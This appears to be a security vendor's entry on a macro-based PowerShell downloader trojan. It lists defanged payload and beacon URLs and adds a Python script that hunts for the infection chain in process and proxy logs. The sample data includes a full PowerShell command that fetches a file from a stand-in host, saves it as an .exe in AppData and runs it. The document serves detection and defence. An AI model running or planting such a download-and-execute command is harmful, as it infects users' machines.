VBA/Agent.EZS!tr.dldr
Analysis
VBA/Agent.EZS!tr.dldr is a generic detection for a Macro/PowerShell Downloader Trojan.
Since this is a generic detection, this malware may have varying behaviour.
Below are some of the observed characteristics/behaviours for this infection:
- This malicious document issues a PowerShell command line that may download from any of the remote sites listed below, then usually saves the payload as %AppData%\[Random].exe, after which it executes it.
- hxxp://kkduacizhbadqw{Removed}.com/XL/itron.pyc
- hxxp://adojqnwdiqzxcqwdqw{Removed}.com/TZ/goblin.pyc
- hxxp://arniytreegoogofasti{Removed}.com/TZ/mnxok.pyc
- hxxp://apjbqjasdqeee{Removed}.com/XL/trond.pyc
- hxxp://bccxgddsiugj{Removed}.com/TZ/itnask.pyc
- hxxp://apjbqjasdqeee{Removed}.com/XL/tronc.pyc
- This malware was also observed to connect to the same sites using the following URLs; the id parameter matches the name of the .pyc payload fetched from that host:
- hxxp://kkduacizhbadqw{Removed}.com/s.php?id=itron
- hxxp://adojqnwdiqzxcqwdqw{Removed}.com/s.php?id=goblin
- hxxp://arniytreegoogofasti{Removed}.com/s.php?id=mnxok
- hxxp://apjbqjasdqeee{Removed}.com/s.php?id=trond
- hxxp://bccxgddsiugj{Removed}.com/s.php?id=itnask
- hxxp://apjbqjasdqeee{Removed}.com/s.php?id=tronc
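The two behaviours above (Office spawning PowerShell that drops and runs an .exe under %AppData%, and the paired payload fetch plus s.php beacon) can be hunted for in endpoint and proxy telemetry. The following is an added example, not code from the Fortinet entry: it runs detection logic over constructed Sysmon-style process-creation events and constructed proxy log lines. The hostnames (`payload-host-a.example` and similar), client IPs, dropped file name and timestamps are invented for the example; the page redacts the real hosts.

```python
# Added example, not part of the Fortinet encyclopedia entry: hunting logic for the
# two behaviours described above, run over constructed sample records. Hostnames,
# client IPs, file names and timestamps are made up; the page redacts the real hosts.
import re
from urllib.parse import urlparse, parse_qs

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Download primitives seen in PowerShell one-liners launched from macros.
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient",
    re.IGNORECASE)
# An .exe placed under the roaming AppData folder, written as %AppData% or $env:APPDATA.
APPDATA_EXE_RE = re.compile(r"(%AppData%|\$env:APPDATA)[^;]*?\.exe", re.IGNORECASE)
# Execution of the dropped file.
EXEC_RE = re.compile(r"Start-Process|Invoke-Item|\bsaps\b|\biex\b", re.IGNORECASE)
# Payload path shape from the URL list above: /XL/<name>.pyc or /TZ/<name>.pyc.
PAYLOAD_RE = re.compile(r"^/(XL|TZ)/([A-Za-z0-9]+)\.pyc$")

# Constructed Sysmon-style process-creation events (Event ID 1 fields, trimmed).
PROCESS_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden -ep bypass -c (New-Object Net.WebClient).DownloadFile("
                    r"'http://payload-host-a.example/XL/itron.pyc', $env:APPDATA+'\k3j9x.exe'); "
                    r"Start-Process ($env:APPDATA+'\k3j9x.exe')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Get-Date"},
]

# Constructed proxy log lines: one client fetches a payload and beacons with the same id.
PROXY_LINES = [
    "2024-05-02T09:14:03Z client=10.0.0.5 url=http://payload-host-a.example/XL/itron.pyc status=200",
    "2024-05-02T09:14:05Z client=10.0.0.5 url=http://payload-host-a.example/s.php?id=itron status=200",
    "2024-05-02T09:20:11Z client=10.0.0.7 url=http://payload-host-b.example/TZ/goblin.pyc status=404",
    "2024-05-02T09:21:40Z client=10.0.0.9 url=http://cdn.example/s.php?id=news status=200",
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_process_event(event: dict) -> bool:
    """True when an Office app spawns PowerShell that downloads, drops an .exe
    under %AppData% and runs it: the chain described for this detection."""
    if basename(event["ParentImage"]) not in OFFICE_PARENTS:
        return False
    if basename(event["Image"]) not in POWERSHELL_IMAGES:
        return False
    cmd = event["CommandLine"]
    return bool(DOWNLOAD_RE.search(cmd) and APPDATA_EXE_RE.search(cmd) and EXEC_RE.search(cmd))


def classify_url(url: str):
    """("payload", name) for /XL|TZ/<name>.pyc, ("beacon", name) for /s.php?id=<name>, else None."""
    parts = urlparse(url)
    m = PAYLOAD_RE.match(parts.path)
    if m:
        return ("payload", m.group(2).lower())
    if parts.path == "/s.php":
        ids = parse_qs(parts.query).get("id")
        if ids:
            return ("beacon", ids[0].lower())
    return None


def correlate(lines):
    """Return (client, name) pairs where one client both fetched <name>.pyc and hit
    s.php?id=<name>; either request alone is only a weak signal."""
    seen = {}
    for line in lines:
        m = re.search(r"client=(\S+)\s+url=(\S+)", line)
        if not m:
            continue
        hit = classify_url(m.group(2))
        if hit:
            seen.setdefault((m.group(1), hit[1]), set()).add(hit[0])
    return sorted(k for k, kinds in seen.items() if kinds == {"payload", "beacon"})


if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        verdict = "FLAG" if flag_process_event(ev) else "ok  "
        print(verdict, basename(ev["ParentImage"]), "->", ev["CommandLine"][:60])
    print("correlated clients:", correlate(PROXY_LINES))
```

Two design points. The `.pyc` extension is only the name the server hands out; the page states the file is saved as an .exe, so the proxy rule keys on the path shape and the payload/beacon pairing rather than on file type. Office-spawned PowerShell on its own is noisy in environments with legitimate macro automation, which is why the endpoint rule requires all three command-line elements (download primitive, .exe under AppData, execution) before flagging.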
- Below is an illustration of the infected document:
- Figure 1: Infected document.
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
Product | Database / component
---|---
FortiGate | Extended
FortiClient |
FortiMail |
FortiSandbox |
FortiWeb | Web Application Firewall
FortiIsolator |
FortiDeceptor |
FortiEDR |